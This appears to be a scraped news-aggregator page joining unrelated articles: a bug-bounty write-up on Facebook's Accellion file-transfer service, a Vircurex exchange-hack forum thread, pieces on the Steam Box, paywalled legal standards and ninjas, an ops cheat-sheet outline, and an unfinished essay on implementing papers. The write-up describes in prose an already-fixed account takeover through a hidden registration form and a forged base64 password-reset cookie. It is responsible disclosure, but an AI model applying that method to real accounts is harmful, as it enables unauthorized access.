Quantcast
Channel: Hacker News 100
Viewing all 5394 articles
Browse latest View live

Nir Goldshlager Web Application Security Blog: How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com )

$
0
0

Comments:"Nir Goldshlager Web Application Security Blog: How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com )"

URL:http://www.nirgoldshlager.com/2013/01/how-i-hacked-facebook-employees-secure.html



Hi,

I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.

Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion),  You may unintentionally expose your organization to these kind of risks

First of all,

If you look at https://files.fb.com, You can understand that this service belongs to Accellion (http://www.accellion.com/solutions/secure-file-transfer),

Now to test a Password Reset logic flaw, We need an account to test for Reset Password Right?,

It seems that Facebook was trying to avoid the creation of accounts in Accellion after removing the register form from the pageview,

I discovered that if you know the direct location of the form (/courier/web/1000@/wmReg.html), You can easily bypass that protection and create an account in files.fb.com,

Now this vulnerability has been fixed and you can't open a new account in files.fb.com, Fixed:

OK, So now we got a new account in files.fb.com Right?, Cool!,
The next step was to download the 45 days trial of Accellion Secure File Sharing Service (http://www.accellion.com/trial-demo),

I realized that that there is two kinds of trial versions of Accellion,

1. Free 45 Day Cloud Hosted Trial (5 users)

2. Free 45 Day Virtual Trial (5 users)

So I chose the VM(virtual) trial, Just for getting all the files and source code of this Accellion application,

The "Bad News" was that the VM trail got a protection and you can't access to the files through the VM Version,

Anyway you can bypass it by mounting the virtual drive in second linux machine ,
This solution made it possible to get all the files names and folders in Accellion Secure File Transfer,

Accellion encrypt their source files content (php) by using ionnCube PHP Encoder (http://www.ioncube.com/sa_encoder.php).

In some older versions of Ioncube you can decrypt this "encrypted" files:

Bad news again!, This Version of ionCube was not vulnerable to a possible decryption , I was disappointed because If I had the source I had the core.

This could help me to find more cool issues such as: Command Execution, Local File Inclusion, etc..,

Anyway i dropped this subject and keep my research on,

I found this interesting file called wmPassupdate.html,

This file used for a Password Recovery in Accellion Secure Files Transfer,

I realized that there is another parameter in the Cookie when you are trying to recover your password in wmPassupdate.html,

This parameter call referer, I found that the value of this parameter use Base64 encoding, Wtf?, I didn't think Base64 (for encryption) was still alive these days, Yes, It appears so :),

So i decoded the base64 value, And so that the decoded data appeared to be my email address ("dbeckyxx@gmail.com"), Cool!, I started to delete all the "junk" cookies un-uneeded parameters and kept only the referer parameter,

I encoded back to Base64 a different email of my test account in files.fb.com, And then copied it into the referer cookie parameter,

Then i started to change the email address parameter in my POST request, to the victim email account and change the pass1,pass2, to my chosen password,

And

PoC Image:


PoC Video:

Facebook, Accellion Fixed this issues, I also reported 20+ different bugs in Accellion Secure File Transfer Service, They fixed all of them :)

Soon i will publish OAuth bypass in Facebook.com, Cya Next time!,


BBC News - Can filming one second of every day change your life?

It Begins: Valve And Xi3 Team For ‘Piston’ Steam Box | Rock, Paper, Shotgun

$
0
0

Comments:"It Begins: Valve And Xi3 Team For ‘Piston’ Steam Box | Rock, Paper, Shotgun"

URL:http://www.rockpapershotgun.com/2013/01/08/it-begins-valve-and-xi3-team-for-steam-box/


By Nathan Grayson on January 8th, 2013 at 9:00 am.

Hey everyone, you’re never going to believe this. The Steam Box? It’s totally real. I know, right? I mean, a series of totally unsubstantiated rumors from Valve alphabeard Gabe Newell was dubious at best, and Big Picture mode spent so much time in development for no reason whatsoever. But somehow – completely unexpectedly – we’re now here, watching Valve and mini-PC maker Xi3 team up to reveal “an integrated system that exceeds the capabilities of leading game consoles, but can fit in the palm of your hand.” Xi3 also compared the device’s physical size to that of a grapefruit, meaning that this is yet another mind-blowing technological advancement I’ll have to worry about accidentally eating.

Beyond those (subject to change) physical specs and full Steam integration, details are depressingly scarce at the moment. Fortunately, an in-development version of the magical space grapefruit will be squirting its Valve-flavored juices into show-goers’ eyes at CES this week, so hopefully we’ll have more specifics soon. Until then, though, here’s Xi3 being really pleased with themselves.

“Today marks the beginning of a new era for Xi3,” said Jason A. Sullivan, founder, President and CEO of Xi3. “This new development stage product will allow users to take full-advantage of their large high-definition TV displays for an amazing computer game experience. As a result, this new system could provide access to thousands of gaming titles through an integrated system that exceeds the capabilities of leading game consoles, but can fit in the palm of your hand.”

It’s also worth noting that Valve’s also made a full-blown investment in Xi3, so this isn’t just some throwaway third-party project. Or at least, it certainly doesn’t seem that way. Meanwhile, a Linux-powered Steam box was allegedly revealed in Germany yesterday, but there’s no telling if the two are one in the same.

So then, the plot thickens, and CES continues to be a treasure trove of interesting (if not necessarily glamorous) windows into the future of PC gaming. The most obvious message here? There are a lot of powerful people attempting to push PC gaming into the living room. Will it work? Will it become the new standard? And, if so, how will the change of scenery affect the focus of the games people choose to develop for our most marvellous of mother platforms? Seems like we’ll get answers to these questions sooner rather than later. Personally, so long as I get to keep my thriving mod and indie scenes, I’m fine with playing anywhere – office, bedroom, living room, in a box, with a fox, whatever.

Actually, that brings us to the rather interesting question of what defines PC gaming as a whole and whether or not this type of thing presents a threat to that essence. So I’m curious: what specific thing(s) makes PC gaming for you, and are you worried that wading into “enemy” (read: console) territory could extinguish that?

Liberating America's secret, for-pay laws - Boing Boing

$
0
0

Comments:"Liberating America's secret, for-pay laws - Boing Boing"

URL:http://boingboing.net/2012/03/19/liberating-americas-secret.html


[Editor's note: This morning, I found a an enormous, 30Lb box waiting for me at my post-office box. Affixed to it was a sticker warning me that by accepting this box into my possession, I was making myself liable for nearly $11 million in damages. The box was full of paper, and printed on the paper were US laws -- laws that no one is allowed to publish or distribute without permission. Carl Malamud, Boing Boing's favorite rogue archivist, is the guy who sent me this glorious box of weird (here are the unboxing pics for your pleasure). I was expecting it, because he asked me in advance if I minded being one of the 25 entities who'd receive this law-bomb on deposit. I was only too glad to accept -- on the condition that Carl write us a guest editorial explaining what this was all about. He was true to his word. -Cory]

Boing Boing Official Guest Memorandum of Law

To: The Standards People
Cc: The Rest of Us People
From: Carl Malamud, Public.Resource.Org
In Re: Our Right to Replicate the Law Without a License

I. “Code Is Law”—Lessig

Did you know that vital parts of the US law are secret, and you're only allowed to read them if you pay a standards body thousands of dollars for the right to find out what the law of the land is?

Public.Resource.Org spent $7,414.26 buying privately-produced technical public safety standards that have been incorporated into U.S. federal law. These public safety standards govern and protect a wide range of activity, from how bicycle helmets are constructed to how to test for lead in water to the safety characteristics of hearing aids and protective footwear. We have started copying those 73 standards despite the fact they are festooned with copyright warnings, shrinkwrap agreements, and other dire warnings. The reason we are making those copies is because citizens have the right to read and speak the laws that we are required to obey and which are critical to the public safety.

When Peter Veeck posted the Building Code of Savoy, Texas on the Web, the standards people came after him with a legal baseball bat. The standards people run private nonprofit organizations that draft model laws that states then adopt as law, through a mechanism known as incorporation by reference.

Peter thought the people of his town should be able to read the law that governed them. But the standards people were adamant that the model building codes were their copyright-protected property and that nobody could post this information without a license, nobody could copy their property without paying the tollmaster.

The U.S. Court of Appeals disagreed, saying that there is a “continuous understanding that ‘the law,’ whether articulated in judicial opinions or legislative acts or ordinances, is in the public domain and thus not amenable to copyright.” Veeck v. Southern Building Code Congress, 293 F.3d 791 (5th Circuit, 2002).

II. “If a Law Isn't Public, It Isn't a Law”—Justice Stephen Breyer

Based on the Veeck decision—and a long line of other court opinions that steadfastly maintain that public access to the text of the laws that govern us is a fundamental aspect of our democratic system— Public.Resource.Org has been posting the building, fire, plumbing, and other state public safety codes since 2007. For the last two years, we've taken the public safety codes of California and converted them to HTML. A group of students in the RDC rural mentoring program have converted the formulas and graphics to SVG and MATHML, and we put the whole thing into an open code repository.

However, the building, fire, and plumbing codes are just a subset of the technical standards that have become law. Despite the 2002 Veeck decision, standards incorporated by reference continue to be sold for big bucks. Big bucks as in $65 for a 2-page standard from the Society of Automotive Engineers, required as part of the Federal Motor Vehicle Safety Standards in 49 CFR § 571. Big bucks as in $847 for a 48-page 1968 standard from Underwriters' Laboratories required as part of the OSHA workplace safety standards in 29 CFR § 1910.

Public.Resource.Org has a mission of making the law available to all citizens, and these technical standards are a big black hole in the legal universe. We've taken a gamble and spent $7,414.26 to buy 73 of these technical public safety standards that are incorporated into the U.S. Code of Federal Regulations. We made 25 print copies of each of these standards and bound each document in a red/white/blue patriotic Certificate Of Incorporation stating that the documents are legally binding on citizens and residents of the United States and that “criminal penalties may apply for noncompliance!

III. Our $273.7 Million Gamble on Print

Why print copies you may ask? Frankly, because we're scared and wanted to take a cautious and prudent first step in duplicating these legal documents. With a print edition, we are able to limit distribution with none of those infinite-copy side effects we know and love about our digital world. Print seemed to be a medium the standards people and the legal people could relate to.

We know from all the copyright warnings, terms of use, scary shrink wrap agreements, and other red-hot rhetoric that accompanies theses documents that the producers continue to believe that copies may not be made under any circumstances. Those of you familiar with copyright math know that statutory damages for unlawful replication of a document is $150,000 per infraction. So, even though we strongly believe that the documents are not entitled to copyright protection, and moreover that our limited print run is in any case definitely fair use, if a judge were to decide that what we did was breaking the law, 25 copies of 73 standards works out to $273,750,000 in potential liability. While whales may make bigger bets, we draw the line at $273 million.

Those copies were bound up in 27.9-pound boxed sets and dispatched to 3 classes of recipients:

Upon the close of the May 1 comment period, it is our intention to begin posting these 73 standards in HTML and begin the process of providing a unified, easy-to-use interface to all public safety standards in the Code of Federal Regulations. It is also our intention to continue this effort to include all standards specifically incorporated by reference in the 50 states. That the law must be available to citizens is a cardinal principle of law in countries such as India and the United Kingdom, and we will expand our efforts to include those jurisdictions as well.

IV. A Poll Tax on Access to Justice

The argument for the status quo is that it costs money to develop these high-quality standards and that it is the stated public policy of government that these standards shall be developed by the private sector using a voluntary, consensus-based approach. (Having spent a lot of time with these documents, we can vouch that many of these standards are very high-quality technical documents. This is important stuff and groups like ASME and NFPA do a great job.)

All nonprofits need money and SDOs are no exception. But, no matter how you slice the cheese, you can't do this on the backs of the informed citizenry. Access to the law is a fundamental legal right.

Do these organizations need the revenue from standards sales in order to keep making high-quality standards? While SDOs have come to rely on this very lucrative monopoly over pieces of the public domain, a look at their revenue streams and executive compensation levels indicates that perhaps they don't need quite as much as they're getting. They all have a variety of revenue streams in addition to document sales ranging from membership fees to conferences to training and directed research (often done with grants, subsidies, or direct support from government). As 501(c)(3) nonprofits with an explicit goal of making their standards into law, SDOs have moral and legal obligations to make those standards that have already become law available to the public and in no case can they prohibit others from doing so.

The scale of these operations is indicated in Table 1, which lists the CEO compensation for ten leading standards-making nonprofits. (ISO refuses to divulge executive compensation despite their status as a nongovernmental organization based in Switzerland.)

Table 1: Compensation of Major Nonprofits Involved in Standards Setting Rank Name of Nonprofit Organization Name of Leader Year Amount
1.Underwriters' LaboratoriesK. Williams2009$2,075,984
2.National Sanitation FoundationKevin Lawlor2009$1,140,012
3.British Standards InstitutionHoward Kerr2010$1,029,161
4.National Fire Protection AssociationJames M. Shannon2009$926,174
5.American National Standards InstituteSaranjit Bhatia2010$916,107
6.ASTM InternationalJames A. Thomas2009$782,047
7.IEEEJames Prendergast2009$422,412
8.Society of Automotive EngineersDavid L. Schutt2009$422,128
9.American Society of Mechanical EngineersThomas G. Loughlin2009$420,960
10.The United States of AmericaBarack Obama2011$400,000

The status quo assumes that the only way to fund a standards-making process is to charge lots of money for the end product. But that is a self-serving self-delusion. The SDOs would actually grow and prosper in an open environment, and they would certainly carry out their mission more effectively. They might need to change their business models, but hasn't the Internet made the rest of us change our business models?

V. “Let Every Sluice of Knowledge Be Set A-Flowing”—John Adams

The Internet was built on open standards that are freely available. Many readers may not realize it, but there were originally two Internets. The one we use is based on TCP/IP and was developed by the IETF and other groups such as the W3C. But, there was another Internet called Open Systems Interconnection (OSI) which was being pushed in the 1980s and early 1990s by the International Organization for Standardization (ISO) and other SDOs. The OSI Internet was based on very expensive standards and it failed miserably. It was open that won and open that scaled.

It is our contention that the physical standards that we're posting are just as important as Internet standards. By making things like the National Fuel and Gas Code, the standard for safety in wood and metal ladders, or the standards for safety and hygiene in water supplies readily available to all without restriction, we make society better. People can read the standards and learn, they can improve upon them by making searchable databases or better navigational tools, they can build new kinds of businesses.

Innovation and education are just two of the benefits of opening up this world, but at the root are basic issues of democracy and justice. We cannot tell citizens to obey laws that are only available for the rich to read. The current system acts as a poll tax on access to justice, a deliberate rationing and restriction of information critical to our public safety. That system is morally wrong and it is legally unconstitutional.

VI. Supporting Materials

  • In response to a petition drafted by Professor Strauss of Columbia Law School, the Office of the Federal Register is taking comments from the public as to whether they should provide greater public access to standards incorporated by reference. You have until March 28 to respond. Please let them know what you think!
  • The Administrative Conference of the United States recently considered the issue of Incorporation by Reference, but ended up not taking any significant action. A particularly strong letter of protest was submitted by EFF.
  • For makers and doers interested in the craft of public printing, we posted photographs of the construction of these boxes of in our print factory.
  • A copy of the packing slip that was in the boxes, including the Notice Of Incorporation, the shipping manifest, and the 7 letters of transmittal to government officials is available for your review as a PDF file as is a sample Certificate Of Incorporation.

Jacques Fuentes - A letter to my daughter, Augusta, in Ruby

$
0
0

Comments:"Jacques Fuentes - A letter to my daughter, Augusta, in Ruby"

URL:http://jpfuentes2.tumblr.com/post/39935683274/a-letter-to-my-daughter-augusta-in-ruby


I wanted to creatively express my affection for my daughter, Augusta, in a way I know best. I chose Ruby for its flexibility and elegance. My hope is to introduce her to its boundless beauty someday soon using this composition.

This is a real, working, program which outputs “Augusta, we <3 you!” when executed. Be sure to read the love.rb file which supports the letter’s syntax. I tried to keep it symmetrical and legible so that the source closely resembles the content.

View the source on github.

BBC News - Japan's ninjas heading for extinction

$
0
0

Comments:"BBC News - Japan's ninjas heading for extinction"

URL:http://www.bbc.co.uk/news/magazine-20135674


22 November 2012Last updated at 20:59 ETBy Mariko OiBBC News, JapanTools of a dying art

Japan's era of shoguns and samurai is long over, but the country does have one, or maybe two, surviving ninjas. Experts in the dark arts of espionage and silent assassination, ninjas passed skills from father to son - but today's say they will be the last.

Japan's ninjas were all about mystery. Hired by noble samurai warriors to spy, sabotage and kill, their dark outfits usually covered everything but their eyes, leaving them virtually invisible in shadow - until they struck.

Using weapons such as shuriken, a sharpened star-shaped projectile, and the fukiya blowpipe, they were silent but deadly.

Ninjas were also famed swordsmen. They used their weapons not just to kill but to help them climb stone walls, to sneak into a castle or observe their enemies.

Most of their missions were secret so there are very few official documents detailing their activities. Their tools and methods were passed down for generations by word of mouth.

This has allowed filmmakers, novelists and comic artists to use their wild imagination.

Hollywood movies such as Enter the Ninja and American Ninja portray them as superhumans who could run on water or disappear in the blink of an eye.

"That is impossible because no matter how much you train, ninjas were people," laughs Jinichi Kawakami, Japan's last ninja grandmaster, according to the Iga-ryu ninja museum.

Continue reading the main story

Five nearly-true ninja myths

  • Ninjutsu is a martial art: In fact, fighting was a last resort - ninjas were skilled in espionage and defeating foes using intelligence, while swinging a sword was deemed a lower art
  • Ninjas could disappear: They couldn't vanish as they do in the movies, but being skilled with explosives, they could make smoke bombs to momentarily misdirect the gaze, then flit away
  • They wore black: Ninja clothing was made to be light and hard to see in the dark - but jet-black would cause the form to stand out in moonlight, so a dark navy blue dye was usually used
  • Ninjas could fly: They moved quietly and swiftly, thanks to breathing techniques which increased oxygen intake, but kept their feet on the ground
  • And walk on water: CIA intelligence says they used "water shoes" - circular wooden boards or buckets - and a bamboo paddle for propulsion, but doubt remains over their effectiveness

Source: Iga-Ryu Ninja Museum

However, ninjas did apparently have floats that enabled them move across water in a standing position.

Kawakami is the 21st head of the Ban family, one of 53 that made up the Koka ninja clan. He started learning ninjutsu (ninja techniques) when he was six, from his master, Masazo Ishida.

"I thought we were just playing and didn't think I was learning ninjutsu," he says.

"I even wondered if he was training me to be a thief because he taught me how to walk quietly and how to break into a house."

Other skills that he mastered include making explosives and mixing medicines.

"I can still mix some herbs to create poison which doesn't necessarily kill but can make one believe that they have a contagious disease," he says.

Kawakami inherited the clan's ancient scrolls when he was 18.

While it was common for these skills to be passed down from father to son, many young men were also adopted into the ninja clans.

There were at least 49 of these but Mr Kawakami's Koka clan and the neighbouring Iga clan remain two of the most famous thanks to their work for powerful feudal lords such as Ieyasu Tokugawa - who united Japan after centuries of civil wars when he won the Battle of Sekigahara in 1600.

It is during the Tokugawa era - known as Edo - when official documents make brief references to ninjas' activities.

"They weren't just killers like some people believe from the movies," says Kawakami.

In fact, they had day jobs. "Because you cannot make a living being a ninja," he laughs.

Please turn on JavaScript. Media requires JavaScript to play.

Kawakami demonstrates ninja techniques

There are many theories about these day jobs. Some ninjas are believed to have been farmers, and others pedlars who used their day jobs to spy.

"We believe some became samurai during the Edo period," says Kawakami. "They had to be categorised under the four caste classes set by the Tokugawa government: warrior, farmers, artisan and merchants."

As for the 21st Century ninja, Kawakami is a trained engineer. In his suit, he looks like any other Japanese businessman.

The title of "Japan's last ninja", however, may not be his alone. Eighty-year-old Masaaki Hatsumi says he is the leader of another surviving ninja clan - the Togakure clan.

Hatsumi is the founder of an international martial arts organisation called Bujinkan, with more than 300,000 trainees worldwide.

"They include military and police personnel abroad," he tells me at one of his training halls, known as dojo, in the town of Noda in Chiba prefecture.

It is a small town and not a place you would expect to see many foreigners. But the dojo, big enough for 48 tatami mats, is full of trainees who are glued to every move that Hatsumi makes. His actions are not big, occasionally with some weapons, but mainly barehanded.

Hatsumi explains to his pupils how those small moves can be used to take enemies out.

Paul Harper from the UK is one of many dedicated followers. For a quarter of a century, he has been coming to Hatsumi for a few weeks of lessons every year.

"Back in the early 80s, there were various martial art magazines and I was studying Karate at the time and I came across some articles about Bujinkan," he says.

"This looked much more complex and a complete form of martial arts where all facets were covered so I wanted to expand my experience."

Harper says his master's ninja heritage interested him at the start but "when you come to understand how the training and techniques of Bujinkan work, the ninja heritage became much less important".

Hatsumi's reputation doesn't stop there. He has contributed to countless films as a martial arts adviser, including the James Bond film You Only Live Twice, and continues to practise ninja techniques.

Both Kawakami and Hatsumi are united on one point. Neither will appoint anyone to take over as the next ninja grandmaster.

"In the age of civil wars or during the Edo period, ninjas' abilities to spy and kill, or mix medicine may have been useful," Kawakami says.

"But we now have guns, the internet and much better medicines, so the art of ninjutsu has no place in the modern age."

As a result, he has decided not to take a protege. He simply teaches ninja history part-time at Mie University.

Despite having so many pupils, Mr Hatsumi, too, has decided not to select an heir.

"My students will continue to practice some of the techniques that were used by ninjas, but [a person] must be destined to succeed the clan." There is no such person, he says.

The ninjas will not be forgotten. But the once-feared secret assassins are now remembered chiefly through fictional characters in cartoons, movies and computer games, or as a tourist attractions.

The museum in the city of Iga welcomes visitors from across the world where a trained group, called Ashura, entertains them with an hourly performance of ninja tricks.

Unlike the silent art of ninjutsu, the shows that school children and foreign visitors watch today are loud and exciting. The mystery has gone even before the last ninja has died.

You can follow the Magazine on Twitter and on Facebook

Mariko Oi's radio report on the last ninja can be heard on the BBC World Service's Outlook programme. Download the Outlook podcast here.

I want the world to scroll this way.

rubytune — rails performance tuning, emergency troubleshooting, server and ops consulting

$
0
0

Comments:"rubytune — rails performance tuning, emergency troubleshooting, server and ops consulting"

URL:http://rubytune.com/cheat


Copy

Process Basics

All processes, with params + hierarchy

Show all ruby-related PIDs and processes

What is a process doing?

What files does a process have open?
(also nice to detect ruby version of a process)

Flavors of kill

Keep an eye on a process

Memory

How much mem is free?
Learn how to read output

List the top 10 memory hogs

Detect OOM and other bad things

Disable OOM killer for a process

Disk/Files

Check reads/writes per disk

Files (often logs) marked for deletion but not yet deleted

Overview of all disks

Usage of this dir and all subdirs

Find files over 100MB

Low hanging fruit for free space.
Check /var/log too!

Find files created within the last 7 days

Find files older than 14 days

Delete files older than 14 days

Monitor a log file for an IP or anything else

Generate a large file (count * bs = total bytes)

Network

TCP sockets in use

Get IP/Ethernet info

host IP resolution

Curl, display headers (I), follow redirects (L)

Traceroute with stats over time (top for traceroute)Requires install

Traceroute using TCP to avoid ICMP blockage

List any IP blocks/rules

Drop any network requests from IP

Show traffic by port

Show all ports listening with process PID

D/L speed test (don't run in prod! :)

Terminal & Screen

Start a screen session as the current user

Join/re-attach to a screen session

Record a terminal session

Playback a recorded terminal session

Tips n Tricks

Run Previous command as root

Change to last working dir

Run something forever

Databases

"Tail" all queries hitting mysql.Learn more
Connect to production mysql locally on port 3307 via sshLearn More

VIRCUREX !!! IMPORTANT !!!

$
0
0

Comments:"VIRCUREX !!! IMPORTANT !!!"

URL:https://bitcointalk.org/index.php?topic=135919.0


Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 12:19:25 PM

 #1
We sadly need to announce that our wallet has been compromised thus DO NOT send any further funds to any of the coin wallets, BTC, DVC, LTC, etc. We will setup a new wallet and reset all the addresses. This will most likely take the whole weekend.
Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
Advertisement: No Excuses; no Exchanges; just Fast payouts. FastCash4Bitcoins
stan.distortion
Hero Member

Offline

Posts: 881

Ignore

Today at 12:31:16 PM

 #2

Ouch, good luck with it. Bitcoin central's down too, looks like someone's being a pain in the ass.

Logged

julz: "Susanne Posel's unwitting work in shepherding the dumbest of the dumb away from Bitcoin is a great benefit to the community, for which we should all be grateful."

John (johnthedong)
Global Janitor and
Global Moderator
Hero Member

Offline

Posts: 3173

Ignore

Today at 01:06:40 PM

 #3

Posted an announcement regarding this at Important Announcements subforum.

Logged
My BTC Tip Jar: 1NB1KFnFqnP3WSDZQrWV3pfmph5fWRyadz
My GPG key ID: B3AAEEB0 My OTC ID: johnthedong
Free escrow service available - tips appreciated! (PM Me)
Endgame
Full Member

Offline

Posts: 205

Ignore

Today at 01:25:49 PM

 #4

Sorry to hear that. How bad is the loss? Will users be out of pocket, or can vircurex cover it?

Logged
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 01:58:50 PM

 #5
Further update:  The system was not breached, no passwords were compromised (they are salted and multiple times hashed anyways). The attacker used a RubyOnRails vulnerability that was released yesterday (http://www.exploit-db.com/exploits/24019/) to withdraw the funds therefore.
Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
ripper234
Hero Member

Offline

Posts: 1140


Ron Gross

Ignore

Today at 03:06:08 PM

 #6
Further update:  The system was not breached, no passwords were compromised (they are salted and multiple times hashed anyways). The attacker used a RubyOnRails vulnerability that was released yesterday (http://www.exploit-db.com/exploits/24019/) to withdraw the funds therefore.

Sorry for your lose.

Amm ... the RoR volnurability was posted to multiple large forums, including Slashdot.

Did the attacker see the announcement before you were able to realize it affects you and shut off your systems? How come you missed it for so long that you didn't shut your stuff off / upgrade in time?

Logged
- Blog
- About
- BTCtoX.org - translate between BTC and any other currency.
thebaron
Sr. Member

Offline

Posts: 460


wat

Ignore

Today at 03:10:11 PM

 #7

Exploit released yesterday, eh? How convenient...

Logged
I run http://mail-to-jail.com. I am "thebaron-btc" on Bitcoin-OTC.
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 03:14:21 PM

 #8

Before the wild speculations beginn, the service will be recovered and we pay the losses out of our own pockets.

Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
davout
Staff
Hero Member

Offline

Posts: 2493


1davout

Ignore

Today at 03:36:07 PM

 #9

Ouch, good luck with it. Bitcoin central's down too, looks like someone's being a pain in the ass.

That's just scheduled maintenance
We deployed the fixes within five minutes after receiving the notification from the Rails security mailing list.
Logged
Buy and sell EUR at Bitcoin-Central.net.
Also check-out Instawallet and Instawire, don't need to sign-up to anything!
-- The problem with the French, is that they don't even have a word for entrepreneur
davout
Staff
Hero Member

Offline

Posts: 2493


1davout

Ignore

Today at 03:36:52 PM

 #10

Exploit released yesterday, eh? How convenient...

It's the truth.
Logged
Buy and sell EUR at Bitcoin-Central.net.
Also check-out Instawallet and Instawire, don't need to sign-up to anything!
-- The problem with the French, is that they don't even have a word for entrepreneur
makomk
Hero Member

Online

Posts: 890

Ignore

Today at 03:40:53 PM

 #11

Exploit released yesterday, eh? How convenient...

Bit slow of the attacker. I was actually half-expecting someone to start hacking Bitcoin sites before any exploit was even publicly released.
Logged
Quad XC6SLX150 Board: 860 MHash/s or so.
SIGS ABOUT BUTTERFLY LABS ARE PAID ADS
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 05:05:41 PM

 #12
Service restored: deposits, trading and withdrawals are working again

For the time being, some restrictions apply until we have sorted out the account details and validated data integrity.

TradingDepositsWithdrawals
BTCActiveActiveOn hold
NMCActiveActiveOn hold
LTCActiveActiveOn hold
DVCActiveActiveActive
SCActiveActiveOn hold
IXCActiveActiveActive
PPCActiveActiveActive
USDActiveActiveActive
EURActiveActiveActive
Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
Atruk
Jr. Member

Online

Posts: 61

Ignore

Today at 05:21:42 PM

 #13
Service restored: deposits, trading and withdrawals are working again

For the time being, some restrictions apply until we have sorted out the account details and validated data integrity.

TradingDepositsWithdrawals
BTCActiveActiveOn hold
NMCActiveActiveOn hold
LTCActiveActiveOn hold
DVCActiveActiveActive
SCActiveActiveOn hold
IXCActiveActiveActive
PPCActiveActiveActive
USDActiveActiveActive
EURActiveActiveActive


It's good to see you are recovering so quickly, especially with the severe downtime or outright collapse most exchanges seem to go through.
Logged

1H8Ep63MQ1BPF8uoDUpz2KFhTAzYKqaUE5

davout
Staff
Hero Member

Offline

Posts: 2493


1davout

Ignore

Today at 05:24:34 PM

 #14

Service restored: deposits, trading and withdrawals are working again


Did you switch servers ?
Logged
Buy and sell EUR at Bitcoin-Central.net.
Also check-out Instawallet and Instawire, don't need to sign-up to anything!
-- The problem with the French, is that they don't even have a word for entrepreneur
Kumala
Sr. Member

Online

Posts: 274

Ignore

Today at 05:58:42 PM

 #15
It's been a couple of stressful hours here.

No we did not switch servers, we:
 - applied the Ruby Rails patch
 - backed up all log files for further analysis
 - log files show the XML code injection, we validated all triggered commands to ensure nothing other than withdrawing funds (e.g. backdoor) was done.
 
2AM here, will need to catch some sleep,  mistakes are easily made when being too tired.

Logged
Exchange: https://vircurex.com BTC, LTC,DVC Stockexchange: http://www.cryptostocks.com
DVC 6/49 Lottery: https://dvc-lotto.com BTC 6/49 Lottery: https://btc-lotto.com
Earn money browsing the Internet: http://www.profitclicking.com/?r=rwrehp4reyg
mc_lovin
Hero Member

Offline

Posts: 1835


www.bitcointrading.com

Ignore

Today at 06:38:45 PM

 #16
Total value lost in the heist?

Sorry for your loss indeed.  Sucks that the vulnerability was in rails and not in your app. 

Logged
kiba
Hero Member

Online

Posts: 5580

Ignore

Today at 07:28:24 PM

 #17

DId you hold ALL your money in cold wallets?

Logged
honest bob
Hero Member

Offline

Posts: 1177

Ignore

Today at 08:32:53 PM

 #18

I'm not sure if I feel worse for bitcoin, vicurex, the people with funds there, or ruby on rails.

Logged
TorGuard VPN: Don't get caught using Bittorrent! Spend your bitcoins on a topnotch VPN/Proxy service! I'm renewing my subscription again later this year.

How to implement an algorithm from a scientific paper | Code Capsule

$
0
0

Comments:"How to implement an algorithm from a scientific paper | Code Capsule"

URL:http://codecapsule.com/2012/01/18/how-to-implement-a-paper/


This article is a short guide to implementing an algorithm from a scientific paper. I have implemented many complex algorithms from books and scientific publications, and this article sums up what I have learned while searching, reading, coding and debugging. This is obviously limited to publications in domains related to the field of Computer Science. Nevertheless, you should be able to apply the guidelines and good practices presented below to any kind of paper or implementation.

1 – Before you jump in

There are a few points you should review before you jump into reading a technical paper and implementing it. Make sure you cover them carefully each time you are about to start working on such a project.

1.1 – Find an open source implementation to avoid coding it

Unless you want to implement the paper for the purpose of learning more about the field, you have no need to implement it. Indeed, what you want is not coding the paper, but just the code that implements the paper. So before you start anything, you should spend a couple of days trying to find an open source implementation on the internet. Just think about it: would you rather lose two days looking for the code, or waste two months implementing an algorithm that was already available?

1.2 – Find simpler ways to achieve your goal

Ask yourself what you are trying to do, and if simpler solutions would work for what you need. Could you use another technique – even if the result is only 80% of what you want – that does not require to implement the paper, and that you could get running within the next two days or so with available open source libraries? For more regarding this, see my article The 20 / 80 Productivity Rule.

1.3 – Beware of software patents

If you are in the U.S., beware of software patents. Some papers are patented and you could get into trouble for using them in commercial applications.

1.4 – Learn more about the field of the paper

If you are reading a paper about the use of Support Vector Machines (SVM) in the context of Computational Neuroscience, then you should read a short introduction to Machine Learning and the different types of classifiers that could be alternatives to SVM, and you should as well read general articles about Computational Neuroscience to know what is being done in research right now.

1.5 – Stay motivated

If you have never implemented a paper and/or if you are new to the domain of the paper, then the reading can be very difficult. Whatever happens, do not let the amount and the complexity of the mathematical equations discourage you. Moreover, speed is not an issue: even if you feel that you understand the paper slower than you wish you would, just keep on working, and you will see that you will slowly and steadily understand the concepts presented in the paper, and pass all difficulties one after the other.

2 – Three kinds of papers

It is never a good idea to pick a random paper and start implementing in right away. There are a lot of papers out there, which means there is a lot of garbage. All publications can fit into three categories:

2.1 – The groundbreaking paper

Some really interesting, well-written, and original research. Most of these papers are coming out of top-tier universities, or out of research teams in smaller universities that have been tackling the problem for about six to ten years. The later is easy to spot: they reference their own publications in the papers, showing that they have been on the problem for some time now, and that they base their new work on a proven record of publications. Also, the groundbreaking papers are generally published in the best journals in the field.

2.2 – The copycat paper

